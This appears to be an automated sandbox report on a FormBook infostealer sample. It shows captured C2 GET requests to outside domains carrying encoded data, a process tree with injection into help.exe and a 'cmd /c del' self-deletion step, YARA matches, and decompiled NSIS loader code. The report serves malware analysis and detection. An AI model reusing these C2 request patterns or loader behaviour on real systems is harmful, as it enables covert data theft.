                                                                                                      Data Ascii: .');f.customer_birth.focus();return false;}if (f.mobile23.value.length < 7){alert(' .');f.mobile23.focus();return false;} var fo_obj = $('.pure-for
                                                                                                      Jun 11, 2021 09:03:13.974369049 CEST4661INData Raw: 6c 6c 62 61 72 2c 20 72 65 73 69 7a 61 62 6c 65 29 0a 7b 0a 20 20 74 6f 6f 6c 62 61 72 5f 73 74 72 20 3d 20 74 6f 6f 6c 62 61 72 20 3f 20 27 79 65 73 27 20 3a 20 27 6e 6f 27 3b 0a 20 20 6d 65 6e 75 62 61 72 5f 73 74 72 20 3d 20 6d 65 6e 75 62 61
                                                                                                      Data Ascii: llbar, resizable){ toolbar_str = toolbar ? 'yes' : 'no'; menubar_str = menubar ? 'yes' : 'no'; statusbar_str = statusbar ? 'yes' : 'no'; scrollbar_str = scrollbar ? 'yes' : 'no'; resizable_str = resizable ? 'yes' : 'no'; window.op
                                                                                                      Jun 11, 2021 09:03:13.974395990 CEST4663INData Raw: 6f 6c 6c 69 6e 67 32 27 29 2e 62 78 53 6c 69 64 65 72 28 7b 0a 20 20 20 20 73 6c 69 64 65 57 69 64 74 68 3a 20 24 28 27 2e 72 6f 6c 6c 69 6e 67 32 20 6c 69 27 29 2e 77 69 64 74 68 28 29 2c 0a 09 09 73 74 61 72 74 53 6c 69 64 65 3a 31 2c 0a 20 20
                                                                                                      Data Ascii: olling2').bxSlider({ slideWidth: $('.rolling2 li').width(),startSlide:1, mode: 'vertical', pager: false, controls:false, auto: true, minSlides:1, maxSlides:1, moveSlides:1, infiniteLoop: true, autoHov
                                                                                                      Jun 11, 2021 09:03:13.974432945 CEST4664INData Raw: 09 09 09 09 09 09 3c 6c 69 3e ea b4 80 eb a0 a8 ec b6 94 ea b0 80 ec a0 95 eb b3 b4 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 66 72 61 6d 65 2f 77 74 6f 74 61 6c 2f 49 6d 67 2f
                                                                                                      Data Ascii: <li></li></a><a href="/frame/wtotal/Img/sub3.php"><li></li></a></ul></div></div></div></div><div class="main_content">
                                                                                                      Jun 11, 2021 09:03:13.974466085 CEST4665INData Raw: 09 09 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 73 65 6c 65 63 74 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 31 22 20 63 6c 61 73 73 3d 22 69 70 5f 62 61 73 65 22
                                                                                                      Data Ascii: <div><span><select name="mobile1" class="ip_base" style="width:72px; margin-right: 2px;"><option value="010">010</option><option value="011">011</option><option valu
                                                                                                      Jun 11, 2021 09:03:13.974493027 CEST4667INData Raw: 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 20 6e 61 6d 65 3d 22 61 67 72 65 65 22 20 69 64 3d 22 61 61 22 20 63 68 65 63 6b 65 64 3d 22 63 68 65 63 6b 65 64 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 61 61 22 20 73 74 79 6c 65 3d
                                                                                                      Data Ascii: type="checkbox" name="agree" id="aa" checked="checked"><label for="aa" style="cursor:pointer"> <a href="javascript:na_open_window('win', '/frame/wtotal/privacy.php', 0, 0, 780, 600, 0, 0, 0, 1, 1);"
                                                                                                      Jun 11, 2021 09:03:13.974515915 CEST4668INData Raw: 3e 0a 09 09 09 09 09 09 3c 6c 69 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 61 79 73 22 3e 32 30 32 31 2d 30 36 2d 31 31 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 6d 65 5f 6e 65
                                                                                                      Data Ascii: ><li><span class="days">2021-06-11</span><span class="name_new">**</span><span class="sex">010-OOOO-7232</span><span class="age"><i></i></span></li><li><span class="days">2
                                                                                                      Jun 11, 2021 09:03:13.974536896 CEST4670INData Raw: 73 3d 22 73 65 78 22 3e 30 31 30 2d 4f 4f 4f 4f 2d 32 32 35 36 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 67 65 22 3e 3c 69 3e ec a0 91 ec 88 98 ec 99 84 eb a3 8c 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 0a 09 09
                                                                                                      Data Ascii: s="sex">010-OOOO-2256</span><span class="age"><i></i></span></li><li><span class="days">2021-06-11</span><span class="name_new">**</span><span class="sex">010-OOOO-3302</span><spa
                                                                                                      Jun 11, 2021 09:03:13.974558115 CEST4671INData Raw: 20 63 6c 61 73 73 3d 22 64 61 79 73 22 3e 32 30 32 31 2d 30 36 2d 31 31 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 6d 65 5f 6e 65 77 22 3e ec 97 bc 2a 2a 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 73
                                                                                                      Data Ascii: class="days">2021-06-11</span><span class="name_new">**</span><span class="sex">010-OOOO-1549</span><span class="age"><i></i></span></li></ul></div></div></div>...//
                                                                                                      Jun 11, 2021 09:03:14.258330107 CEST4673INData Raw: 4f 4f 2d 38 37 38 36 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 67 65 22 3e 3c 69 3e ec a0 91 ec 88 98 ec 99 84 eb a3 8c 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09
                                                                                                      Data Ascii: OO-8786</span><span class="age"><i></i></span></li><li><span class="name_new">**</span><span class="sex">010-OOOO-5450</span><span class="age"><i></i></span></li>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.349744107.180.57.11180C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:19.407633066 CEST4684OUTGET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.dndemystified.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:19.565264940 CEST4685INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 11 Jun 2021 07:03:19 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 315
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.34975045.195.169.19780C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:24.978941917 CEST4940OUTGET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.meganfantastic.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:25.300106049 CEST5009INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 11 Jun 2021 07:03:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 479
                                                                                                      Connection: close
                                                                                                      ETag: "6080f05e-1df"
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: KY4cmAI0jU.exe PID: 2128 Parent PID: 5892

                                                                                                      General

                                                                                                      Start time:09:01:30
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:224710 bytes
                                                                                                      MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: KY4cmAI0jU.exe PID: 1632 Parent PID: 2128

                                                                                                      General

                                                                                                      Start time:09:01:30
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:224710 bytes
                                                                                                      MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 1632

                                                                                                      General

                                                                                                      Start time:09:01:35
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:
                                                                                                      Imagebase:0x7ff714890000
                                                                                                      File size:3933184 bytes
                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: help.exe PID: 5448 Parent PID: 3388

                                                                                                      General

                                                                                                      Start time:09:01:53
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\SysWOW64\help.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                      Imagebase:0xb80000
                                                                                                      File size:10240 bytes
                                                                                                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:moderate

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: cmd.exe PID: 5380 Parent PID: 5448

                                                                                                      General

                                                                                                      Start time:09:01:56
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:/c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x380000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6060 Parent PID: 5380

                                                                                                      General

                                                                                                      Start time:09:01:57
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: KY4cmAI0jU.exe PID: 2128 Parent PID: 5892 KY4cmAI0jU.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\KY4cmAI0jU.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\KY4cmAI0jU.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\KY4cmAI0jU.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                                                                                                        0x00403248
                                                                                                        0x0040324c
                                                                                                        0x00403254
                                                                                                        0x00403256
                                                                                                        0x0040325b
                                                                                                        0x00403266
                                                                                                        0x0040326d
                                                                                                        0x00403275
                                                                                                        0x0040327f
                                                                                                        0x00403295
                                                                                                        0x004032a5
                                                                                                        0x004032aa
                                                                                                        0x004032b0
                                                                                                        0x004032b7
                                                                                                        0x004032ca
                                                                                                        0x004032cf
                                                                                                        0x004032d1
                                                                                                        0x004032d3
                                                                                                        0x004032d8
                                                                                                        0x004032d8
                                                                                                        0x004032e8
                                                                                                        0x004032ee
                                                                                                        0x00403357
                                                                                                        0x00403357
                                                                                                        0x00403359
                                                                                                        0x0040335b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004032f4
                                                                                                        0x004032f7
                                                                                                        0x004032ff
                                                                                                        0x004032ff
                                                                                                        0x00403302
                                                                                                        0x00403307
                                                                                                        0x00403309
                                                                                                        0x00403309
                                                                                                        0x0040330a
                                                                                                        0x0040330a
                                                                                                        0x0040330f
                                                                                                        0x00403312
                                                                                                        0x00403347
                                                                                                        0x0040334c
                                                                                                        0x00403351
                                                                                                        0x00403354
                                                                                                        0x00403356
                                                                                                        0x00403356
                                                                                                        0x00403356
                                                                                                        0x00000000
                                                                                                        0x00403314
                                                                                                        0x00403314
                                                                                                        0x00403315
                                                                                                        0x00403318
                                                                                                        0x00403320
                                                                                                        0x00403323
                                                                                                        0x00403325
